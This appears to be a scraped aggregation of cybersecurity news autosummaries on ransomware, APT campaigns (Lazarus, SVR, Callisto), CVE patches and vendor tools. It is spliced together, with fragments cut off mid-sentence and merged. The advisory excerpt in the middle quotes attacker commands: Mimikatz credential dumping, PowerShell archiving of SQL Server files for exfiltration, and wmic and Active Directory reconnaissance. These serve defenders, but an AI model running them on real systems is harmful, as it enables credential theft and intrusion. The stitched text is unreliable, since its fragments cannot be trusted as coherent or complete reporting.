accordance with applicable federal standards, industry best practices, and/or agency-defined requirements.By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates. "Autosummary:
"In this Help Net Security video, Gal Sadeh, Head of Data and Security Research at Silverfort, discusses LATMA, a free, open-source tool. It’s engineered with advanced algorithms to track and report any unusual activity within an environment. The tool consists of two modules: Logs collector – This module collects authentication traffic from the Active Directory environment. It gathers the logs from the domain controllers and endpoints, focusing only on interactive Kerberos and NTLM authentications. Analyzer … More
The post A closer look at LATMA, the open-source lateral movement detection tool appeared first on Help Net Security.
"Autosummary:
"The ThreatNG Governance and Compliance Dataset is an open-source initiative that aims to democratize access to critical data, fostering transparency, collaboration, and improvement of cybersecurity practices globally. Datasets for organizational insight The open-source datasets offered by ThreatNG provide an understanding of organizational practices, promoting informed decision-making and accountability within the corporate landscape. These datasets include: ESG (Environmental, Social, Governance) filings – A dataset highlighting a company’s dedication to sustainability, ethical behavior, and good governance, offering … More
The post ThreatNG open-source datasets aim to improve cybersecurity practices appeared first on Help Net Security.
"Autosummary:
How you can use the datasets Eric Gonzales, founder of ThreatNG, told Help Net Security what they experienced with their security service provider customers/partners, along with how they have used the ethics and governance documents: Develop compliant incident response plans These documents provide frameworks for developing incident response plans that comply with the customer’s ethical and governance requirements. "When it comes to ransomware attacks, the impact on OT environments is catching up to the impact on IT environments, according to Claroty. In Claroty’s previous survey conducted in 2021, 32% of ransomware attacks impacted IT only, while 27% impacted both IT and OT. Today, 21% impact IT only, while 37% impact both IT and OT – a significant 10% jump for the latter in just two years. This trend speaks to the expanding attack … More
The post Industry regulations and standards are driving OT security priorities appeared first on Help Net Security.
"Autosummary:
The most popular methods are the Common Vulnerability Scoring System (CVSS), used by 52% of global respondents, followed by existing security solutions’ risk scores (49%), the Exploit Prediction Scoring System (EPSS) (46%), and the Known Exploited Vulnerabilities (KEV) Catalog (45%). "Autosummary:
"How are organizations performing across cybersecurity controls in the Minimum Viable Secure Product (MVSP) framework? A recent analysis by Bitsight and Google reveals some good and some bad results – and room for improvement. What is MVSP? Minimum Viable Secure Product (MVSP) is a baseline security checklist for B2B software and business process outsourcing suppliers, consisting of 25 controls across four key areas – Business, Application Design, Application Implementation, and Operational. For the “Cybersecurity Control … More
The post Which cybersecurity controls are organizations struggling with? appeared first on Help Net Security.
"Autosummary:
Eight MVSP controls that are important for vulnerability management – External Testing, Self-assessment, Vulnerability Prevention, Encryption, HTTPS-only, Security Headers, Dependency Patching, Time to Fix Vulnerabilities – have either high 2023 Fail rates, low Pass rates, or both, across all industries. "Autosummary:
KillMilk has since announced that he was retiring, and appointed a new leader "Deanon Club," who has claimed that "there will be a large-scale recruitment for the KillNet team, on all fronts" with the goal of striking government financial facilities, encryption firms, and the gambling sector. "Over a year has passed since Sophos delivered patches for a vulnerability affecting Sophos Firewalls (CVE-2022-3236) that was being actively exploited by attackers, and now they have pushed additional ones to protect vulnerable EOL devices. “In December 2023, we delivered an updated fix after identifying new exploit attempts against this same vulnerability in older, unsupported versions of the Sophos Firewall,” the company shared on Monday by updating of the original security advisory. “No action is … More
The post EOL Sophos firewalls get hotfix for old but still exploited vulnerability (CVE-2022-3236) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
You can explore these and numerous other features of ANY.RUN, including private space for your team, Windows 7, 8, 10, 11 VMs, and API integration completely for free. Use case Information about AxileStealer provided by the ANY.RUN sandbox In this example, the initial file, 237.06 KB in size, drops AxilStealer"s executable file, 129.54 KB in size. "Autosummary:
"In some cases, following the stolen session cookie replay activity, the actor leveraged the compromised user account to perform BEC financial fraud reconnaissance by opening email attachments in Microsoft Outlook Web Application (OWA) that contain specific keywords such as "payment" and "invoice," Microsoft said. "Autosummary:
Microsoft provided the following mitigations to reduce the impact of these types of threats: Mitigate credential guessing attacks risks; Enable conditional access policies; Ensure continuous access evaluation is enabled; Enable security defaults; Enable Microsoft Defender automatic attack disruption; Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, OAuth applications) "Autosummary:
"Autosummary:
LockBit recruits affiliates from distressed gangs As first reported by LeMagIT, LockBitSupp, the LockBit operation"s manager, has begun to recruit affiliates from the BlackCat and NoEscape ransomware operations. "Autosummary:
"By choosing to exploit CVE-2023-42793, a software development program, the authoring agencies assess the SVR could benefit from access to victims, particularly by allowing the threat actors to compromise the networks of dozens of software developers," CISA warned today. "Autosummary:
The set of Cisco products under analysis includes the Customer Collaboration Platform, Identity Services Engine (ISE), Nexus Dashboard Fabric Controller (NDFC), Unified Communications Manager (Unified CM), Unified Contact Center Enterprise (Unified CCE), and Prime Infrastructure. "Autosummary:
The other vulnerability we wanted to highlight is listed as CVE-2023-35628, a Windows MSHTML platform remote code execution (RCE) vulnerability with a CVSS score of 8.1 out of 10 and in severity listed as “Critical.” "Autosummary:
The use of Google Forms is also clever in that the responses are sent from the address "forms-receipts-noreply@google[.]com," which is a trusted domain and, therefore, have a higher chance of bypassing secure email gateways, as evidenced by a recent Google Forms phishing campaign uncovered by Cisco Talos last month. "Autosummary:
UK Home Office is ignoring the risk of ‘catastrophic ransomware attacks,’ report warns Pierluigi Paganini December 13, 2023 December 13, 2023 A Joint Committee on the National Security Strategy (JCNSS) warns of the high risk of a catastrophic ransomware attack on the UK government. "Autosummary:
BazarCall, first documented in 2021, is a phishing attack utilizing an email resembling a payment notification or subscription confirmation to security software, computer support, streaming platforms, and other well-known brands. "Autosummary:
"At the same time, the full cooperation with Europol, Eurojust and the Cypriot authorities made it possible to search his home in a Cypriot seaside resort, thus providing important elements of investigation," said Nicolas Guidoux, a Deputy Director in the French Ministry of the Interior. "Autosummary:
Known ransomware attacks by gang, November 2023 Known ransomware attacks by country, November 2023 Known ransomware attacks by industry, November 2023 One of the most interesting developments last month were new reports reinforcing claims that Rhysida may be a rebrand of the infamous Vice Society ransomware gang.The explanation, then, likely resides in a combination of facts: Ransomware attacks are up overall for all sectors Healthcare is easy to attack (Large number of weak points due to use of legacy systems, third-party vendors, etc). Preventing Ransomware with ThreatDown ThreatDown detecting LockBit ransomware ThreatDown automatically quarantining LockBit ransomware ThreatDown Bundles combinesthe technologies and services that resource constrained IT teams need into four streamlined, cost-effective bundles that take down threats, take down ransomware gangs: "In this Help Net Security interview, Matt Holland, CEO of Field Effect, discusses achieving a balance for businesses between the advantages of using AI in their cybersecurity strategies and the risks posed by AI-enhanced cyber threats. Holland also explores how education, awareness, and implemented measures prepare organizations for these evolving challenges. Furthermore, he underscores that relying solely on AI-driven solutions without human expertise leads to disaster. There’s a lot of buzz around AI supercharging cyberattacks. … More
The post Balancing AI advantages and risks in cybersecurity strategies appeared first on Help Net Security.
"Autosummary:
That’s not to say there’s no reason to be concerned, though—AI and LLMs could be used to create even more sophisticated social engineering campaigns—think deepfakes, audio messages, recordings, and even well-crafted emails that would be much harder to discern from the real thing.Instead, look for a trusted partner that can help manage your protection, and invest in a holistic solution that can evaluate your cyber risk and proactively detect security events across your entire IT environment—including endpoints, networks, and any cloud or SaaS infrastructure you rely on. "Autosummary:
"North Korea-backed group Lazarus has been spotted exploiting the Log4Shell vulnerability (CVE-2021-44228) and novel malware written in DLang (i.e., the memory-safe D programming language). “This campaign consists of continued opportunistic targeting of enterprises globally that publicly host and expose their vulnerable infrastructure to n-day vulnerability exploitation such as CVE-2021-44228. We have observed Lazarus target manufacturing, agricultural and physical security companies,” Cisco Talos researchers shared. Log4Shell still opens doors Log4Shell is a critical remote code execution … More
The post Lazarus exploit Log4Shell vulnerability to deliver novel RAT malware appeared first on Help Net Security.
"Autosummary:
Then they deployed HazyLoad – a custom-made proxy tool – to gain continuous access, create a new local user account, and download credential dumping tools (ProcDump, MimiKatz), as well as a novel DLang-based remote access trojan (RAT) called NineRAT, which was first spotted in a campaign in March 2023. "Autosummary:
"Autosummary:
The official website is offline, but the company informed subscribers via its social media channels that it was targeted by hackers this morning, causing a technical failure that impacts mobile communications and internet access. "Autosummary:
Netgate, the vendor of pfSense, received reports about the three flaws on July 3, 2023, and released security updates that addressed them on November 6 (pfSense Plus 23.09) and November 16 (pfSense CE 2.7.1). "Autosummary:
"Autosummary:
Blacksmith: Initial reconnaissance by Lazarus: The APT group gains initial access through successful exploitation of CVE-2021-44228; Lazarus deploys NineRAT; “NineRAT is written in DLang and indicates a definitive shift in TTPs from APT groups falling under the Lazarus umbrella with the increased adoption of malware being authored using non-traditional frameworks such as the Qt framework, including MagicRAT and QuiteRAT .” "Autosummary:
"Autosummary:
The number of bugs in each vulnerability category is listed below: 10 Elevation of Privilege Vulnerabilities 8 Remote Code Execution Vulnerabilities 6 Information Disclosure Vulnerabilities 5 Denial of Service Vulnerabilities 5 Spoofing Vulnerabilities The total count of 34 flaws does not include 8 Microsoft Edge flaws fixed on December 7th. "Autosummary:
Alternative: ThreatDown Vulnerability Assessment solution For teams seeking a streamlined approach, the ThreatDown Vulnerability Assessment solution, free for all ThreatDown customers, offers: Single, Lightweight Agent To simplify security and reduce costs, Vulnerability Assessment deploys easily in minutes without a reboot, using the same agent and cloud-based console that powers all ThreatDown endpoint security technologies. Elworthy, reflecting on his Langdale experience, highlights the importance of a tool capable of handling large-scale environments efficiently, a critical aspect for organizations with extensive networks: “Free tools often struggle with large networks,” Elworthy said.Elworthy points out the hidden labor costs in using “free” tools, which can affect team efficiency: “The time and labor required to maintain scans and update tools can be significant,” Elworthy said, reflecting on his time at Langdale. "Autosummary:
Kyivstar, Ukraine’s largest mobile carrier brought down by a cyber attack Pierluigi Paganini December 12, 2023 December 12, 2023 Kyivstar, the largest Ukraine service provider, was hit by a cyber attack that paralyzed its services. “This morning we became the target of a powerful cyber attack that caused a technical failure that led to temporarily unavailable services: 🔸 mobile connection; 🔸 Internet access. "Autosummary:
“During the special operation, military intelligence managed to break into one of the well-protected key central servers of the Federal Tax Service (FSS of the Russian Federation), and further into more than 2,300 of its regional servers throughout Russia, as well as in the territory of the temporarily occupied Crimea.” reads a statement published by the Main Intelligence Directorate of the Ministry of Defense of Ukraine. "The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.
Software developers use TeamCity software to manage and automate software compilation, building, testing, and releasing. If compromised, access to a TeamCity server would provide malicious actors with access to that software developer’s source code, signing certificates, and the ability to subvert software compilation and deployment processes—access a malicious actor could further use to conduct supply chain operations. Although the SVR used such access to compromise SolarWinds and its customers in 2020, limited number and seemingly opportunistic types of victims currently identified, indicate that the SVR has not used the access afforded by the TeamCity CVE in a similar manner. The SVR has, however, been observed using the initial access gleaned by exploiting the TeamCity CVE to escalate its privileges, move laterally, deploy additional backdoors, and take other steps to ensure persistent and long-term access to the compromised network environments.
To bring Russia’s actions to public attention, the authoring agencies are providing information on the SVR’s most recent compromise to aid organizations in conducting their own investigations and securing their networks, provide compromised entities with actionable indicators of compromise (IOCs), and empower private sector cybersecurity companies to better detect and counter the SVR’s malicious actions. The authoring agencies r "
Autosummary:
SQL Server executable files - based on the review of the post exploitation actions, the SVR showed an interest in specific files of the SQL Server installed on the compromised systems: C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll, C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll, C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll, C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\secforwarder.dll Visual Studio files – based on the review of the post exploitation actions, the SVR showed an interest in specific files of the Visual Studio: C:\Program Files (x86)\Microsoft Visual Studio\2017\SQL\Common7\IDE\VSIXAutoUpdate.exe Update management agent files – based on the review of the post exploitation actions, the SVR showed an interest in executables and configuration of patch management software: C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd\bin\httpd.exe C:\Program Files (x86)\PatchManagementInstallation\Agent\12\Httpd C:\ProgramData\GFI\LanGuard 12\HttpdConfig\httpd.conf Interest in SQL Server Based on the review of the exploitation, the SVR also showed an interest in details of the SQL Server [T1059.001],[T1505.001]: powershell Compress-Archive -Path "C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqlmin.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllos.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqllang.dll","C:\Program Files\Microsoft SQL Server\MSSQL14.MSSQLSERVER\MSSQL\Binn\sqltses.dll" -DestinationPath C:\Windows\temp\1\sql.zip SVR cyber actors also exfiltrated secforwarder.dll Tactics Used to Avoid Detection To avoid detection, the SVR used a “Bring Your Own Vulnerable Driver” nltest -dclist nltest -dsgetdc tasklist netstat wmic /node:""<redacted>"" /user:""<redacted>"" /password:""<redacted>"" process list brief wmic /node:""<redacted>"" process list brief wmic process get commandline -all wmic process <proc_id> get commandline wmic process where name=""GoogleCrashHandler64.exe"" get commandline,processed powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties powershell ([adsisearcher]"((samaccountname=<redacted>))").Findall().Properties.memberof powershell Get-WmiObject -Class Win32_Service -Computername powershell Get-WindowsDriver -Online -AllSUMMARY The U.S. Federal Bureau of Investigation (FBI), U.S. Cybersecurity & Infrastructure Security Agency (CISA), U.S. National Security Agency (NSA), Polish Military Counterintelligence Service (SKW), CERT Polska (CERT.PL), and the UK’s National Cyber Security Centre (NCSC) assess Russian Foreign Intelligence Service (SVR) cyber actors—also known as Advanced Persistent Threat 29 (APT 29), the Dukes, CozyBear, and NOBELIUM/Midnight Blizzard—are exploiting CVE-2023-42793 at a large scale, targeting servers hosting JetBrains TeamCity software since September 2023.REG_DWORD /d "0" /f The SVR used the following Mimikatz commands [T1003]: privilege::debug lsadump::cache lsadump::secrets lsadump::sam sekurlsa::logonpasswords Persistence The SVR relied on scheduled tasks [T1053.005] to secure persistent execution of backdoors.[T1564], illustrated below: Privilege Escalation To facilitate privilege escalation [T1098], the SVR used multiple techniques, including WinPEAS, NoLmHash registry key modification, and the Mimikatz tool. BMP files that were used to exchange data were generated in the following way: Compress data using zlib, Encrypt data using custom algorithm, Add “***” string literal to encrypted data, Create a random BMP with random rectangle, And finally, encode encrypted data within lower pixel bits.Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount" Get-NetDiDomain Get-AdUser Get-DomainUser -UserName "Autosummary:
"Cybercriminals still prefer targeting open remote access products, or like to leverage legitimate remote access tools to hide their malicious actions, according to WatchGuard. “Threat actors continue using different tools and methods in their attack campaigns, making it critical for organizations to keep abreast of the latest tactics to fortify their security strategy,” said Corey Nachreiner, chief security officer at WatchGuard. “Modern security platforms that include firewalls and endpoint protection software can deliver enhanced protection … More
The post Cybercriminals continue targeting open remote access products appeared first on Help Net Security.
"Autosummary:
Still, script-based attacks remain the largest attack vector, accounting for 56% of total attacks, and scripting languages like PowerShell are often used in living-off-the-land attacks.For instance, in researching the top phishing domains, the Threat Lab observed a tech support scam that would result in a victim downloading a pre-configured, unauthorised version of TeamViewer, which would allow an attacker full remote access to their computer. "Researchers are exploring promising quantum computing applications across various domains, from cryptography and optimization problems to drug discovery and artificial intelligence. The race to harness the power of quantum bits has sparked a wave of innovation and collaboration, bringing together experts from physics, computer science, and engineering to unlock the full potential of this groundbreaking technology. Quantum computers, with their ability to perform complex calculations at speeds unattainable by classical counterparts, possess the potential to … More
The post Adapting cybersecurity for the quantum computing era appeared first on Help Net Security.
"Autosummary:
"With its innovative feature for generating reliable Vulnerability Exploitability eXchange (VEX) documents, Kubescape became the first open-source project to provide this functionality. This advancement offers security practitioners a powerful tool to effectively prioritize and address software vulnerabilities. What is Vulnerability Exploitability eXchange (VEX)? Vulnerability Exploitability eXchange (VEX) is a standard that facilitates the sharing and analyzing of information about vulnerabilities and their potential for exploitation. VEX documents have emerged as a critical component in complementing … More
The post Kubescape open-source project adds Vulnerability Exploitability eXchange (VEX) support appeared first on Help Net Security.
"Autosummary:
“We are excited to be the first open-source project to generate VEX documents,” said Ben Hirschberg, CTO and co-founder of ARMO and maintainer of the Kubescape project. "Autosummary:
"Autosummary:
Kimusky, also known by the names APT43, ARCHIPELAGO, Black Banshee, Emerald Sleet (previously Thallium), Nickel Kimball, and Velvet Chollima, is an element operating under North Korea"s Reconnaissance General Bureau (RGB), which also houses the Lazarus Group. "Autosummary:
"Autosummary:
Personal information stolen by the attackers includes a combination of name, address, Social Security number, driver"s license/state ID number, passport number, financial account information (such as bank account and credit card numbers), and employment-related health insurance and medical information for each affected individual. "Autosummary:
"Autosummary:
The attacker"s server replies with the victim"s external IP address and one of the following commands for local execution by the malware: deleteme – Delete the malware from the system using a BAT file – Delete the malware from the system using a BAT file download – Download files from a specified remote location – Download files from a specified remote location rename – Rename files on the infected system – Rename files on the infected system iamsleep – Instruct the malware to enter a dormant state for a set period – Instruct the malware to enter a dormant state for a set period upload – Upload files to the C2 server – Upload files to the C2 server showurls – No implemented yet Finally, Cisco"s analysts discovered BottomLoader, a malware downloader that fetches and executes payloads from a hardcoded URL using PowerShell while also establishing persistence from them by modifying the Startup directory. DLRAT"s first activity on a device is to execute hard-coded commands to collect preliminary system information like OS details, network MAC address, etc., and send it to the C2 server. "Autosummary:
"Autosummary:
"Autosummary:
Backup Migration vulnerable code (Wordfence) Patch released within hours Wordfence reported the critical security flaw to BackupBliss, the development team behind the Backup Migration plugin, on December 6, with the developers releasing a patch hours later. "Autosummary:
Toyota Financial Services discloses a data breach Pierluigi Paganini December 11, 2023 December 11, 2023 Toyota Financial Services (TFS) disclosed a data breach, threat actors had access to sensitive personal and financial data. "Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Australian Signals Directorate’s Australian Cyber Security Centre (ASD"s ACSC) are releasing this joint CSA to disseminate the Play ransomware group’s IOCs and TTPs identified through FBI investigations as recently as October 2023.
Since June 2022, the Play (also known as Playcrypt) ransomware group has impacted a wide range of businesses and critical infrastructure in North America, South America, and Europe. As of October 2023, the FBI was aware of approximately 300 affected entities allegedly exploited by the ransomware actors.
In Australia, the first Play ransomware incident was observed in April 2023, and most recently in November 2023.
The Play ransomware group is presumed to be a closed group, designed to “guarantee the secrecy of deals,” according to a statement on the group’s data leak website. Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data. Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email.
The FBI, CISA, and ASD’s ACSC encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents. T "
Autosummary:
Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA or the FBI. REPORTING The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with Play ransomware actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.In some instances, cybersecurity researchers have observed Play ransomware actors using PowerShell scripts to target Microsoft Defender.[2] Lateral Movement and Execution Play ransomware actors use command and control (C2) applications, including Cobalt Strike and SystemBC, and tools like PsExec, to assist with lateral movement and file execution. Discovery and Defense Evasion Play ransomware actors use tools like AdFind to run Active Directory queries [TA0007] and Grixba [1], an information-stealer, to enumerate network information [T1016] and scan for anti-virus software [T1518.001]. Initial Access The Play ransomware group gains initial access to victim networks through the abuse of valid accounts [T1078] and exploitation of public-facing applications [T1190], specifically through known FortiOS (CVE-2018-13379 and CVE-2020-12812) and Microsoft Exchange (ProxyNotShell [CVE-2022-41040 and CVE-2022-41082]) vulnerabilities.The FBI, CISA, and ASD’s ACSC recommend that software manufacturers incorporate secure-by-design and -default principles and tactics into their software development practices to limit the impact of ransomware techniques (such as threat actors leveraging backdoor vulnerabilities into remote software systems), thus, strengthening the security posture for their customers. VALIDATE SECURITY CONTROLS In addition to applying mitigations, the FBI, CISA, and ASD’s ACSC recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. "Autosummary:
"Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Advanced ransomware campaigns expose need for AI-powered cyber defense In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. SessionProbe: Open-source multi-threaded pentesting tool SessionProbe is a multi-threaded pentesting … More
The post Week in review: Booking.com hotel booking scam, Kali Linux 2023.4 released appeared first on Help Net Security.
"Autosummary:
Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: Advanced ransomware campaigns expose need for AI-powered cyber defense In this Help Net Security interview, Carl Froggett, CIO at Deep Instinct, discusses emerging trends in ransomware attacks, emphasizing the need for businesses to use advanced AI technologies, such as deep learning (DL), for prevention rather than just detection and response. New infosec products of the week: December 8, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Atsign, Daon, Global Integrity, Living Security, Panther Labs, Searchlight Cyber, and Varonis. "Autosummary:
"Autosummary:
"Autosummary:
"The threat actor has been actively monitoring threat reports to perform quick changes thus evading detections," security researchers Ernesto Fernández Provecho, Pham Duy Phuc, Ciana Driscoll, and Vinoo Thomas said. "Autosummary:
The compromised information varied for each person and could have included: name, contact information, Social Security Number, date of birth, health information, insurance information, and medical identification numbers. "Autosummary:
It impacts the following CPUs - Existing AMD CPUs vulnerable to CVE-2020-12965 Future Intel CPUs supporting LAM (both 4- and 5-level paging) Future AMD CPUs supporting UAI and 5-level paging Future Arm CPUs supporting TBI and 5-level paging "Arm systems already mitigate against Spectre v2 and BHB, and it is considered the software"s responsibility to protect itself against Spectre v1," Arm said in an advisory. "Autosummary:
According to other partners, over this period, the MOA also exploited other vulnerabilities, such as that affecting Microsoft Windows Support Diagnostic Tool (MSDT, CVE-2022-30190, also called Follina) as well as than those targeting the Roundcube application (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026). "Autosummary:
"Autosummary:
"Legkodymov"s guilty plea today confirms that he was well aware that Bitzlato, his cryptocurrency exchange, was being used like an open turnstile by criminals eager to take advantage of his lax controls over illicit money transactions," said U.S. Attorney Breon Peace for the Eastern District of New York. "The Apache Struts project has released updates for the popular open-source web application framework, with fixes for a critical vulnerability that could lead to remote code execution (CVE-2023-50164). About CVE-2023-50164 CVE-2023-50164 may allow an attacker to manipulate file upload parameters to enable path traversal. Under some circumstances this may allow the attacker to upload a malicious file that can be used to perform remote code execution. No additional details are available at this time. The … More
The post New RCE vulnerability in Apache Struts 2 fixed, upgrade ASAP (CVE-2023-50164) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
Customers, commonly referred to as "affiliates," have various payment options, including flat fees, subscriptions, or a percentage of the revenue. The bottom line Ransomware attacks have grown increasingly sophisticated, resulting in more powerful, targeted, and agile threats. "Autosummary:
"Attackers can use this type of malware to gain money by building a proxy server network or to perform criminal acts on behalf of the victim: to launch attacks on websites, companies and individuals, buy guns, drugs, and other illicit goods," Kaspersky security researcher Sergey Puzan said. "Autosummary:
“In connection with his plea agreement, Anatoly Legkodymov, aka Anatolii Legkodymov, Gandalf, and Tolik, 41, who is a Russian national and resided in Shenzen, People’s Republic of China, agreed to dissolve Bitzlato and to release any claim over approximately $23 million in seized assets of Bitzlato.” "Autosummary:
Even if a system has been patched for these flaws, insiders can gain elevated privileges through other means, such as DLL hijacking flaws in apps running with elevated privileges, insecure file system permissions or service configurations, or Bring Your Own Vulnerable Driver (BYOVD) attacks. A typical insider attack Crowdstrike explains that utilizing privilege escalation vulnerabilities to gain administrative privileges is critical to many insider attacks, as in most cases, rogue insiders start with low-level access to their network environments. However, in these cases, though they are not used to attack the company, they are commonly utilized in a risky manner, potentially introducing threats or malware to the network that threat actors could abuse. In both scenarios, installing the fake exploit on a workstation would allow initial access to a corporate network, which could lead to cyber espionage, data theft, or ransomware attacks. "Autosummary:
The men are said to be members of the Callisto Group (also known as Star Blizzard, SEABORGIUM, TA446, COLDRIVER, TAG-53, and BlueCharlie). Two men have been charged with hacking into computer networks in the United States, UK, other NATO countries, and Ukraine, on behalf of the Russian government. "Autosummary:
Admin showing "Repair" as their Tox status Source: BleepingComputer However, BleepingComputer suspects that the ransomware gang may have suffered potential law enforcement action after their recent activities, which was also hinted at by others. "Autosummary:
" The attackers gained access to a wide range of sensitive information, including name, contact information, Social Security Number, date of birth, health information, insurance information, and medical identification numbers. "Autosummary:
"Autosummary:
"Autosummary:
"As ransomware continues to be on the rise, we can expect groups to continue to evolve their attacks and operate at a larger scale for bigger profits. This will put organizations at higher risk if they don’t adopt a more aggressive security strategy. Here is what we can expect the ransomware landscape to look like in 2024. In 2024, we’ll see more mass exploitations of vulnerabilities As a result of the pandemic, organizations moved many … More
The post Ransomware in 2024: Anticipated impact, targets, and landscape shift appeared first on Help Net Security.
"Autosummary:
As a result, attack surfaces — most prominently in manufacturing, healthcare, and education — doubled and tripled in size, which appealed to ransomware groups. "90% of the world’s largest energy companies experienced a third-party breach in the past 12 months, according to SecurityScorecard. Powering the global economy and everyday activities, the energy sector’s significance makes it a key focus for cyber threats. The urgency to protect this critical sector grows amid economic and political uncertainties. Cyberattacks on energy don’t just cause financial losses and disruptions; they also impact manufacturing, healthcare, and transportation. Third-party breaches in the energy industry 100% … More
The post Third-party breaches shake the foundations of the energy sector appeared first on Help Net Security.
"Autosummary:
Successful management of third-party cyber risks relies on achieving three essential outcomes: Efficient use of resources Effective risk management and resilience Impact on business decision-making “Hope and prayer may be useful but are clearly not sustainable strategies. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Dinah Davis – @dinah_davis Episode links: Sponsored by: Push Security – Monitor and secure your entire identity attack surface, including non-SSO identities. "Malwarebytes announced its comprehensive vulnerability assessment module is now included in every ThreatDown bundle at no additional cost via its integrated console. Many IT organizations are struggling with rising cybersecurity costs associated with annual vendor price increases and the necessity of adding more tools to protect against an ever-increasing attack surface. Malwarebytes, with its portfolio of award-winning ThreatDown solutions, is taking a different approach, helping customers reduce threats, security complexity and costs by providing a … More
The post Malwarebytes unveils vulnerability assessment module to help users identify critical vulnerabilities appeared first on Help Net Security.
"Autosummary:
“Many IT organizations are using disparate security products that are complex, expensive and don’t easily integrate, leaving them both overwhelmed and exposed to critical vulnerabilities,” said Marcin Kleczynski, CEO, Malwarebytes. "Autosummary:
"Autosummary:
Exploitation techniques, often seen in digital channels like email, phone calls, or text messages, are frequently used for phishing. Defending ourselves To safeguard against these attacks against our minds, we should align our cognitive standards with emotional triggers by asking questions like; what is the purpose, expectation, and legitimacy of the interaction.These tactics manipulate established interactions to achieve various objectives, such as deceiving individuals into parting with funds, opening malicious files, submitting credentials, or revealing sensitive data. As humans, our minds set us apart, marked by a multitude of traits and emotions, often too complicated to articulate precisely. "Autosummary:
"The data these two companies receive includes metadata, detailing which app received a notification and when, as well as the phone and associated Apple or Google account to which that notification was intended to be delivered," the letter read. "Autosummary:
Threat actors could propagate the threat by exploiting vulnerabilities in Internet-facing systems, conducting credential brute force attacks, and tricking victims into downloading deceptive packages or binaries (i.e., files masquerading as product updates) from untrustworthy third-party sources. "Autosummary:
As a Bitzlato co-founder and principal stakeholder, Legkodymov (also known as "Gandalf" and "Tolik") has agreed to disband the cryptocurrency exchange and relinquish any rights to approximately $23 million in seized assets, as outlined in the plea agreement. "Autosummary:
Callisto"s latest tactics In a bulletin published today, the UK"s NCSC says Callisto remains focused on launching spear-phishing attacks targeting the country"s governmental organizations, think tanks, politicians, defense-industrial units, and various NGOs. In addition, the UK says the group is behind credential and data theft attacks against parliamentarians from multiple political parties, universities, journalists, the public sector, non-government organizations, and other civil society organizations. "Autosummary:
When communicating with the command and control (C2) server, Krasue can accept the following commands: ping – Reply with `pong` – Reply with `pong` master – Set the master upstream C2 – Set the master upstream C2 info – Get information about the malware: main pid, child pid, and its status such as “root: gained root permissions,” “god: process is unable to be killed,” “hidden: process is hidden,” “module: rootkit is loaded” – Get information about the malware: main pid, child pid, and its status such as “root: gained root permissions,” “god: process is unable to be killed,” “hidden: process is hidden,” “module: rootkit is loaded” restart – Restart child process – Restart child process respawn – Restart main process – Restart main process god die – Kill itself Group-IB discovered nine distinct C2 IP addresses hardcoded into the malware, with one using port 554, which is common in RTSP (Real Time Streaming Protocol) connections. "Autosummary:
Even if they have a secure, unencrypted backup of their important data to rebuild their systems from, they will still have to handle the possible fall-out when sensitive information about their business, their employees, their suppliers, and their customers is released into the public domain by the criminals. Meanwhile, liberal arts college DePauw University in Indiana says that it was recently targeted, and a "limited amount of data on specific individuals was accessed." "Autosummary:
